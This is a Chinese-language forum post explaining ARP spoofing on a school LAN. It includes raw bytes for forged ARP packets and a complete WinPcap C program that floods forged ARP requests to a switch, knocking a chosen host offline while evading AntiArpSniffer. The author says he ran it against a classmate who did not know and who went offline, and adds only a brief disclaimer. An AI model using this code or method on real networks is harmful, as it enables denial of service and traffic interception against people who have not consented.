前段時間我們學校的的網路總是出現掉線的問題,後來說是ARP欺騙,要我們用ANTIARPSNIFFER。小弟不才,
也想搞清楚這個ARP欺騙到底是個什麼東西。於是在網上查了點資料,看了點文檔。也算是DIY了一個出來,而
且可以不被ANTIARPSNIFFER發現的讓對方主機在網路中死掉。於是把這個小東西貼出來讓大家一起把玩一下。
在下菜鳥一隻,還請高手指教
參考資料:《TCP/IP詳解II:實現》,《WINPCAP 3.0 DOC》,《切換式網路中的嗅探和ARP欺騙》(一位叫RefDom
的大哥很久前寫的帖子)
一般在局域網中的各主機一般都是連接到同一個交換機(或是HUB),再由交換機連接路由器,路由器再與
相對於該局域網的外部網路相連。在我們的主機和交換機的記憶體中,都保留著一張ARP的緩存表(你可以在cmd
下用arp -a來查看),它記錄著IP位址和MAC位址的對應關係。當外部網路的一個包傳進來,交換機通過這個包
的IP位址,在他的ARP緩存表中查找其對應的MAC位址(因為交換機是工作在鏈路層的,所以他只會根據MAC位址
來判斷是哪個主機),當找到時,他就把這個包傳給擁有這個MAC位址的主機。當主機向外部網路通信的時候,
主機查詢自己的ARP緩存表裡閘道(在這裡就是交換機)(這個閘道是用IP位址確定的)的MAC位址,然後將包
傳給交換機,交換機一看是它的MAC位址,就把這個包往上傳給路由器。
我們可以把IP比做姓名,把MAC位址比做聯繫方式
當主機連接上網路時,他會發送一個廣播(ARP REQUEST)說:大家好,我是IP xxx,這是我的MAC位址aaa,
大家以後用他聯繫,叫IP YYY的閘道大哥的MAC地址是多少啊 ,小弟以後找還要拜託大哥了,記個聯繫方式先~
然後閘道IP YYY告訴IP XXX說(ARP REPLY):我就是閘道IP XXX,我已經記下了你IP和你的MAC地址,我的
MAC地址是ccc,以後有事聯繫,別客氣~
現在,假如出現了一些不明原因的錯誤,主機A中的arp緩存表中閘道IP YYY對應的MAC地址不是閘道的,而
是另一台主機B的(BBB),那麼當主機A發送了一個包時,他查詢自己的ARP緩存表,把主機B的MAC位址填在了
閘道的地方,然後把包發了出去,交換機一看這個MAC地址,心想這不是給我的小弟B的嗎,於是把這個包發給
了內網中的B,而主機A卻不知道這個包已經迷失在了網路中。
再假設另一個錯誤,現在主機中的arp緩存表沒錯,而交換機的緩存錯了,主機A的IP對應的MAC位址上填的是
主機B的!,那麼當外部網路的一個發給主機A的包到達交換機的時候,交換機查自己的ARP緩存表,一看這個IP
(A的)對應了自己內網中一個主機的MAC位址 (B的),於是就把這個包傳給了擁有這個MAC位址的B,而不是A
!
另外還有一點很重要的是,ARP協定中,無論主機A有沒有REQUEST或是已經收到了REPLY,當再有REPLY來的
時候,它都會記下這個REPLY中的資訊,並更新自己的ARP緩存。同樣交換機,也只要是有主機發送ARP REQUEST
,他就會記下這個資訊,並更新自己的ARP緩存,而不會管這個請求是對是錯
原諒我說了這麼多晦澀的話,但這決不是廢話,因為所謂的arp欺騙就是將上面所說的兩個錯誤人為的造成
。
第一種欺騙方法:欺騙主機A說,我是閘道IP YYY,我的MAC地址改成BBB了,於是主機A就出現了我們剛說的
第一種情況的錯誤。
第二種欺騙方法:欺騙交換機說,我是主機A IP XXX,我的MAC地址是BBB,於是交換機出現了我們說的第二
種情況的錯誤。
既然要騙人家,就要讓別人相信你說的是真的,首先我們要符合ARP包的格式,另外我們要讓該真的地方真,
這樣別人才會相信你說的假話。
先來看下ARP包是個什麼樣的(TCP/IP詳解II圖21-7有詳細說明,大家可以查查看)
typedef struct ethhdr //乙太網頭部,長度14
{
unsigned char dst[6]; //目的的MAC位址
unsigned char src[6]; //源的MAC地址
unsigned short type; //框架類型
}ETHHDR,*PETHDHR;
typedef struct eth_arphdr //乙太網arp欄位長度28
{
unsigned short arp_hrd; //硬體類型
unsigned short arp_pro; //協議類型
unsigned char arp_hln; //硬體位址長度(6)
unsigned char arp_pln; //協議位址長度(4)
unsigned short arp_op; //回應還是請求
unsigned char arp_sha[6]; //發送者MAC地址
unsigned long arp_spa; //發送者IP
unsigned char arp_tha[6]; //接收者MAC地址
unsigned long arp_tpa; //接收者IP
}ETH_ARPHDR,*PETH_ARPHDR;
typedef struct arp //整個ARP包的結構
{
ETHHDR ethhdr;
ETH_ARPHDR eth_arp;
}ARP,*PARP;
現在我們再來看下arp request 和arp reply到底是個什麼樣子。
我打開了winpcap devlopment pack中的一個例副程式TestApp,他帶有很簡單的嗅探功能,然後我用
arp -d 10.10.63.254(我的閘道IP地址),清除了我的ARP緩存表中閘道的記錄,過一下,我再用arp -a查看自
己的緩存表,閘道的IP,MAC又寫上來了,這說明一次REQUEST和REPLY已經完成。於是,我在TestApp的輸出中
找到了他們的包的記錄:
我的IP地址是10.10.63.37(即0a 0a 3f 25),MAC地址是00 20 ED 89 53 B9
我的閘道的IP地址是10.10.63.254(即0a 0a 3f fe),MAC地址是00 11 5d ac e8 00
request的:長度42
FF FF FF FF FF FF 00 20 ED 89 53 B9 08 06 00 01 08 00 06 04 00 01 00 20 ED 89 53 B9 0A 0A 3F
25 00 00 00 00 00 00 0A 0A 3F FE
reply的: 長度60
00 20 ED 89 53 B9 00 11 5D AC E8 00 08 06 00 01 08 00 06 04 00 02 00 11 5D AC E8 00 0A 0A 3F
FE 00 20 ED 89 53 B9 0A 0A 3F 25 00 00 00 00 00....(後面都是用0填充)
好了根據這兩個包,我們就能構造惡意的REQUEST和REPLY,假如我們要讓一台內網中的主機C消失,假設他的IP
是10.10.63.123,MAC位址是11 22 33 44 55 66那麼我們可以這樣來構造包(我們使用一個偽造的MAC位址,比
如是AA BB CC DD EE FF
惡意的request:長度42
FF FF FF FF FF FF AA BB CC DD EE FF 08 06 00 01 08 00 06 04 00 01 AA BB CC DD EE FF 0A 0A 3F
7B 00 00 00 00 00 00 0A 0A 3F FE
當交換機接受了這個請求並更新了自己的ARP緩存後,任何發給10.10.63.123的包都會轉發到MAC位址是
AA BB CC DD EE FF的主機(假如這個主機才內網中存在的話)
惡意的reply :長度60
11 22 33 44 55 66 AA BB CC DD EE FF 08 06 00 01 08 00 06 04 00 02 AA BB CC DD EE FF 0A
0A 3F FE 11 22 33 44 55 66 0A 0A EF 7B 00 00 00 00 00.....(後面用0填充)
當主機接受到了這個包,並更新了自己的ARP緩存後,他所發的任何包都會轉發給擁有這個MAC位址的主機(同
上,這個主機必須存在)。
現在假如交換機和主機都被欺騙了,於是就出現了這樣的一個情況:主機A和其他主機或是外部網路的一切
通信就都會傳給這個偽造MAC的主機,而如果這個主機再將這些包轉發給原來的接收方的話,他就成了THE
MIDDLE MAN,而這種方式也正是交換機網路中的嗅探原理了。有興趣的話,大家也可以寫個試試~
現在回到我們的話題上來,當我們自己的網路中出現了類似的欺騙的時候,我們應該怎麼防範?很多人估計
都會想到用專門的軟體,比如ANTIARPSNIFFER3.0,這個軟體實際是將閘道的IP位址和MAC位址的對應關係綁定
,當接受到一個ARP REPLY時他會查看這個包中發送方的IP和MAC位址,如果IP是閘道的,而MAC地址不是,那他
就認為這是個ARP欺騙,於是記錄這個假的MAC位址(當然我們可以偽造,如果你想架禍人的話,也可以填別人
的...,但如果你是想嗅探(即是你自己的MAC地址),那麼你可能會在某天被一群人抓出去暴打一頓...,為什
麼我們生活的世界這麼暴力,不能和平解決呢?額...我請大哥們吃頓飯怎麼樣??)
ANTIARPSNIFFER可以有效的阻止發送給主機的欺騙REPLY,但他無法阻止發送給交換機的欺騙REQUEST,因此
也就無法捕獲惡意攻擊者的MAC位址,所以我個人認為站在攻擊的角度,第二種欺騙方式要比第一種來的更加有
效和不易被發現,畢竟誰的會關注自身的安全,卻往往忽視社會整體的安全隱患....要想解決這個問題,就必
須把交換機的ARP緩存設為靜態(即將IP和MAC的對應關係鎖死)(使用ARP -S)來解決。然而,對於主機使用
DHCP動態獲取IP的網路(比如我們學校的網路),由於IP與MAC位址無法在長時間內保持一致,因此交換機的
ARP緩存表必須是可更新的(即動態),於是對於這種網路,發送欺騙REQUEST給交換機的攻擊方式將是無法解
決的....
也正因為此,我所編寫的一個測試程式是基於第二種攻擊方式(即發送加的ARP REQUEST請求給交換機)。
由於是測試程式,我把一切可能出錯的部分都做了最簡化以方便調試,程式相當簡陋,不過仍然很有效。
另外要說明的是,我安裝了WINPCAP 3.0(一個OPEN SOURCE的網卡驅動專案)和他的開發包。並參考了WINPCAP
DOC中的程式和RefDom大哥在帖子裡的程式,當然還有偉大的W.Richard.Stevens的《TCP/IP詳解II實現》第21
章
/////////////////////////////////////////////////////////////////////////////
// arp attacker
// author:enolaZ
// e-mail:enolaz@126.com
/////////////////////////////////////////////////////////////////////////////
#include<stdio.h>
#include"packet32.h"
#include<winsock2.h>
#pragma comment(lib,"ws2_32")
#pragma comment(lib,"packet")
#define EPT_ARP 0x0806 //定義了一些在構造包的時候要用到的常量
#define EPT_IP 0x0800
#define ARP_HARDWARE 0X0001
#define ARP_REPLY 0x0002
#define ARP_REQUEST 0x0001
#pragma pack(push,1) //在定義結構的時候一頂要用到pack(push,1)和下麵的pack(pop)
//否則你構造的結構的長度會有問題
typedef struct ethhdr //乙太網頭部,長度14
{
unsigned char dst[6]; //目的的MAC位址
unsigned char src[6]; //源的MAC地址
unsigned short type; //框架類型
}ETHHDR,*PETHDHR;
typedef struct eth_arphdr //乙太網arp欄位長度28
{
unsigned short arp_hrd; //硬體類型
unsigned short arp_pro; //協議類型
unsigned char arp_hln; //硬體位址長度(6)
unsigned char arp_pln; //協議位址長度(4)
unsigned short arp_op; //回應還是請求
unsigned char arp_sha[6]; //發送者MAC地址
unsigned long arp_spa; //發送者IP
unsigned char arp_tha[6]; //接收者MAC地址
unsigned long arp_tpa; //接收者IP
}ETH_ARPHDR,*PETH_ARPHDR;
typedef struct arp //整個ARP包的結構
{
ETHHDR ethhdr;
ETH_ARPHDR eth_arp;
}ARP,*PARP;
#pragma pack(pop)
#define Max_Num_Adapter 10
char AdapterList[Max_Num_Adapter][1024]; //定義的網路介面卡列表
int main (int argc,char* argv[])
{
LPADAPTER lpAdapter = 0;
LPPACKET lpPacket;
int i;
DWORD dwErrorCode;
WCHAR AdapterName[8192];
WCHAR *temp,*temp1; //將AdapterNames的內容轉存到AdapterList時用
int AdapterNum=0;
ULONG AdapterLength;
ARP arpPacket; //定義的包結構實例
char szPktBuf[256000]; //用於存放包的內容
printf("%d\n",sizeof(ETHHDR)); //這3行是我在測試結構長度時用的,如果沒有使用之
printf("%d\n",sizeof(ETH_ARPHDR)); //前說的pack(push,1),pack(pop)長度就成了14,32
printf("%d\n",sizeof(ARP)); //48,與我們的arp包的格式不符
i=0;
AdapterLength = sizeof(AdapterName);
if(PacketGetAdapterNames((char *)AdapterName,&AdapterLength)==FALSE)//獲取所有網路介面卡
{
printf("Unable to retrieve the list of the adapters!\n");
return -1;
}
temp=AdapterName;
temp1=AdapterName;
while ((*temp!='\0')||(*(temp-1)!='\0')) //將AdapterNames的內容轉存到AdapterList
{
if (*temp=='\0')
{
memcpy(AdapterList[i],temp1,(temp-temp1)*2);
temp1=temp+1;
i++;
}
temp++;
}
AdapterNum=i;
for (i=0;i<AdapterNum;i++)
wprintf(L"\n%d- %s\n",i+1,AdapterList[i]); //輸出獲得的所有網路介面卡
printf("\n");
lpAdapter = PacketOpenAdapter(AdapterList[0]); //得到對應網路介面卡的_Adapter結構,我
//就一個當然是0了
if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE))
{
dwErrorCode=GetLastError();
printf("Unable to open the adapter, Error Code : %lx\n",dwErrorCode);
return -1;
}
lpPacket=PacketAllocatePacket(); //得到一個包的_Packet結構
if(lpPacket==NULL)
{
printf("alloc lppacket failed");
return -1;
}
ZeroMemory(szPktBuf,sizeof(szPktBuf)); //將包的緩存區清空
arpPacket.ethhdr.dst[0]=0xff; //開始填充包結構arpPacket
arpPacket.ethhdr.dst[1]=0xff;
arpPacket.ethhdr.dst[2]=0xff;
arpPacket.ethhdr.dst[3]=0xff;
arpPacket.ethhdr.dst[4]=0xff;
arpPacket.ethhdr.dst[5]=0xff;
arpPacket.ethhdr.src[0]=0x00; //一個偽造的MAC位址
arpPacket.ethhdr.src[1]=0x20;
arpPacket.ethhdr.src[2]=0xce;
arpPacket.ethhdr.src[3]=0xa8;
arpPacket.ethhdr.src[4]=0x54;
arpPacket.ethhdr.src[5]=0x33;
arpPacket.ethhdr.type=htons(EPT_ARP);
arpPacket.eth_arp.arp_hrd=htons(ARP_HARDWARE);
arpPacket.eth_arp.arp_pro=htons(EPT_IP);
arpPacket.eth_arp.arp_hln=6;
arpPacket.eth_arp.arp_pln=4;
arpPacket.eth_arp.arp_op=htons(ARP_REQUEST);
arpPacket.eth_arp.arp_sha[0]=0x00; //仍然是假的MAC地址
arpPacket.eth_arp.arp_sha[1]=0x20;
arpPacket.eth_arp.arp_sha[2]=0xce;
arpPacket.eth_arp.arp_sha[3]=0xa8;
arpPacket.eth_arp.arp_sha[4]=0x54;
arpPacket.eth_arp.arp_sha[5]=0x33;
arpPacket.eth_arp.arp_spa=inet_addr("10.10.63.123"); //冒充對象的IP
arpPacket.eth_arp.arp_tha[0]=0x00;
arpPacket.eth_arp.arp_tha[1]=0x00;
arpPacket.eth_arp.arp_tha[2]=0x00;
arpPacket.eth_arp.arp_tha[3]=0x00;
arpPacket.eth_arp.arp_tha[4]=0x00;
arpPacket.eth_arp.arp_tha[5]=0x00;
arpPacket.eth_arp.arp_tpa=inet_addr("10.10.63.254"); //閘道IP
printf("%d\n",sizeof(arpPacket));
memcpy(szPktBuf,(char*)&arpPacket,sizeof(arpPacket));
PacketInitPacket(lpPacket,szPktBuf,60);
while(getchar()!='q') //當輸入為q時結束
{
if(PacketSendPacket(lpAdapter,lpPacket,true)==false) //不斷發送偽造資訊,將目標的正確
//ARP REQUEST淹沒
{
printf("error in sending packet");
return -1;
}
}
printf("send ok");
PacketFreePacket(lpPacket); //一點掃尾的工作
PacketCloseAdapter(lpAdapter);
return 1;
}
好了,這個異常簡陋的程式結束了,我對我們內部網的某同學測試過,當我程式啟動不久,去他寢室看,他已
經掉線了,而他的AntiArpSniffer卻沒有報警,呵呵這說明攻擊很成功~。
當然要說明的一點是,這個東西完全是研究學習用,沒有惡意,也希望大家不要隨便對別人做壞事,恩恩,為
了學習研究的目的當然可以做一下實驗,但不要太有破壞性哦~(如果你想被一群憤怒的群眾痛打,那我也沒話
說...)。可憐了我那位元實驗物件 ...找個機會請他吃個飯吧~
